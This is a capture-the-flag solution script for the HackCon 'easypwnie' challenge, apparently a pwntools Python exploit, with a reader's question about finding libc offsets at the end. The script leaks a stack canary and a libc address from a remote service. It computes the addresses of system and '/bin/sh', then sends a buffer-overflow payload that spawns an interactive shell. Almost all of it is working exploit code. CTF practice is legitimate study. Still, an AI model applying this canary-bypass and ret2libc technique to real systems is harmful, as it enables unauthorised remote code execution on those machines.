[hackcon]easypwnie

easypwnie.py

from pwn import *
import numpy as np
import sys


'''
0x00019ad3 <+243>:	mov    DWORD PTR [esp],eax
0x00019ad6 <+246>:	call   0x32f50 <exit>

p system
$2 = {<text variable, no debug info>} 0x3fe70 <system>

.rodata:0015DA8C aBinSh          db '/bin/sh',0 
'''
local = False
if local:
	s = remote("127.0.0.1",8888)
	raw_input()
else:
	s = remote('54.218.14.40',3031)
	raw_input()
print len(s.recvline(timeout=2))
print len(s.recvline(timeout=2))
print len(s.recvline(timeout=2))
print len(s.recvline(timeout=2))
s.sendline("13 9")
if not local:
	print len(s.recvline(timeout=2))
canary_msg = s.recvline(timeout=2)
sys.stdout.flush()
print len(canary_msg)
canary = int(np.uint32(int(canary_msg.split("be ")[1])))
print "Canary : ",hex(canary)

s.sendline("17 9")
if not local:
	print len(s.recvline(timeout=2))
libc_msg = s.recvline(timeout=2)
sys.stdout.flush()
print len(libc_msg)
libc_base = int(np.uint32(int(libc_msg.split("be ")[1])))
print "libc base : ",hex(libc_base)

# s.sendline("-12 -1")
# if not local:
# 	print len(s.recvline(timeout=2))
# stack_msg = s.recvline(timeout=2)
# sys.stdout.flush()
# print len(libc_msg)
# stack_leak = int(np.uint32(int(stack_msg.split("be ")[1])))+8
# print "stack leak : ",hex(stack_leak)

s.sendline("0 1")

if not local:
	system = libc_base-0x00019ad3+0x3fe70
	bin_sh = libc_base-0x00019ad3+0x15da8c
else:
	system = libc_base-0x00019a63+0x3e3e0
	bin_sh = libc_base-0x00019a63+0x15fa69
payload = 'A'*10+p32(canary)+'B'*12+p32(system)+p32(bin_sh)*2
s.sendline(payload)
s.interactive()

I wonder how you find offset of system and bin_sh on server?